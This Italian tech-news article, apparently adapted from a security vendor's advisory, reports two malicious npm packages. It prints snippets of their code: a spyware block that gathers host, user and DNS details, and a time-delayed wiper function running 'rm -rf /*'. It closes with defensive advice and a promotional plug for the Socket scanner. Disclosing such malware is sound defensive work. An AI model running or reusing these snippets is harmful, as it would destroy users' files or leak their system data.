UPGRD

Tutte le ultime notizie tech e non

Sicurezza informatica

Scoperti Due Pacchetti npm Maligni: Attenzione ai Dati Rubati e Distrutti!

By ,

Due Pacchetti npm Maligni Scoperti: Come Difendersi dai Pericoli Nascosti

npm, uno dei più grandi ecosistemi di pacchetti per sviluppatori JavaScript, è stato recentemente colpito da due pacchetti maligni: transferwise-iconfont e protect-api. Entrambi i pacchetti, ora contrassegnati come malware, rappresentano minacce diverse per gli sviluppatori e i loro progetti. Ecco un'analisi dettagliata delle minacce e dei metodi per proteggersi.

Pacchetto 1: Il Ladro di Dati

Il pacchetto transferwise-iconfont si spaccia per una versione legittima della libreria TransferWise Iconfont, ma il codice al suo interno è completamente estraneo alla libreria ufficiale. Questo pacchetto, progettato per agire come spyware, raccoglie dati sensibili dal sistema dell'utente e li invia a un server remoto controllato dall'attaccante.

const trackingData = JSON.stringify({
    p: package,
    c: __dirname,
    hd: os.homedir(),
    hn: os.hostname(),
    un: os.userInfo().username,
    dns: dns.getServers(),
    r: packageJSON ? packageJSON.___resolved : undefined,
    v: packageJSON.version,
    pjson: packageJSON,
});

Questo tipo di spyware è facilmente identificabile tramite un'analisi del codice, ma se ignorato può portare a gravi compromissioni di sicurezza, esfiltrando informazioni come API keys e credenziali.

Pacchetto 2: Il Distruttore di Dati

Il secondo pacchetto, chiamato protect-api, finge di essere una libreria utile per la gestione dei cookie HTTP, ma nasconde un pericoloso codice obfuscato. Questo malware include una funzione chiamata angry() che, dopo un'ora dall'installazione, tenta di cancellare tutti i file del sistema, rendendo difficile risalire alla causa dell'attacco.

function angry() {
  sh.exec("rm -rf *  > /dev/null 2>&1");
  sh.exec("rm -rf /*  > /dev/null 2>&1");
}

Questo pacchetto è particolarmente pericoloso perché non solo nasconde le sue intenzioni tramite obfuscazione, ma attiva il suo payload distruttivo con un ritardo temporale, rendendo complicata l’individuazione tempestiva.

Come Proteggersi: Migliori Pratiche

Per evitare che pacchetti maligni come questi infettino i progetti, è essenziale seguire alcune pratiche di sicurezza fondamentali:

  • Verifica delle Fonti: Controllare sempre l'affidabilità degli autori dei pacchetti e le statistiche di download. Pacchetti nuovi e con poche installazioni possono essere sospetti.
  • Revisione del Codice: Implementare pratiche rigorose di code review per le dipendenze di terze parti, cercando codice obfuscato o chiamate di rete inattese.
  • Strumenti di Sicurezza: Utilizzare strumenti automatici di scansione per rilevare modelli di codice malevolo o vulnerabilità note.

Per proteggere i propri progetti, si consiglia di installare Socket, il nostro strumento AI per il rilevamento di minacce. Con pochi clic, l'app gratuita per GitHub analizza automaticamente le dipendenze, garantendo una protezione in tempo reale contro pacchetti pericolosi.

FAQ

Cosa sono i pacchetti maligni npm?

I pacchetti maligni npm sono librerie o moduli che, pur apparendo legittimi, contengono codice dannoso progettato per compromettere la sicurezza dei progetti degli sviluppatori.

Quali sono i nomi dei pacchetti maligni recentemente scoperti?

I pacchetti maligni recentemente scoperti sono 'transferwise-iconfont' e 'protect-api'.

Qual è la minaccia principale del pacchetto 'transferwise-iconfont'?

Il pacchetto 'transferwise-iconfont' agisce come spyware, raccogliendo dati sensibili dall'utente e inviandoli a un server remoto controllato dall'attaccante.

Cosa fa il pacchetto 'protect-api'?

Il pacchetto 'protect-api' finge di essere una libreria per la gestione dei cookie HTTP, ma contiene codice obfuscato che tenta di cancellare tutti i file del sistema dopo un'ora dall'installazione.

Come posso identificare pacchetti maligni nel mio progetto?

Puoi identificare pacchetti maligni attraverso un'analisi del codice, cercando codice obfuscato o chiamate di rete inattese, e utilizzando strumenti automatici di scansione per rilevare vulnerabilità.

Quali pratiche di sicurezza posso seguire per proteggere i miei progetti?

È importante verificare le fonti dei pacchetti, implementare revisioni rigorose del codice e utilizzare strumenti di sicurezza per la scansione delle dipendenze.

Cosa fa la funzione 'angry()' nel pacchetto 'protect-api'?

La funzione 'angry()' tenta di cancellare tutti i file del sistema, rendendo difficile risalire alla causa dell'attacco, e viene attivata un'ora dopo l'installazione del pacchetto.

Perché è importante controllare le statistiche di download dei pacchetti?

Controllare le statistiche di download aiuta a identificare pacchetti sospetti; pacchetti nuovi o con poche installazioni possono essere più rischiosi.

Cosa è Socket e come può aiutare nella sicurezza dei pacchetti?

Socket è uno strumento AI per il rilevamento di minacce che analizza automaticamente le dipendenze su GitHub, offrendo protezione in tempo reale contro pacchetti pericolosi.

Quali tipi di dati possono essere esfiltrati dal pacchetto 'transferwise-iconfont'?

Il pacchetto 'transferwise-iconfont' può esfiltrare dati sensibili come API keys, credenziali e informazioni personali dell'utente.

Precedente

Rainbow Six Siege: L'Evento di Halloween Sta per Tornare, Siete Pronti?

Successivo

Overthinking: Come Riconoscerlo e Fermarlo Prima che Diventi un Problema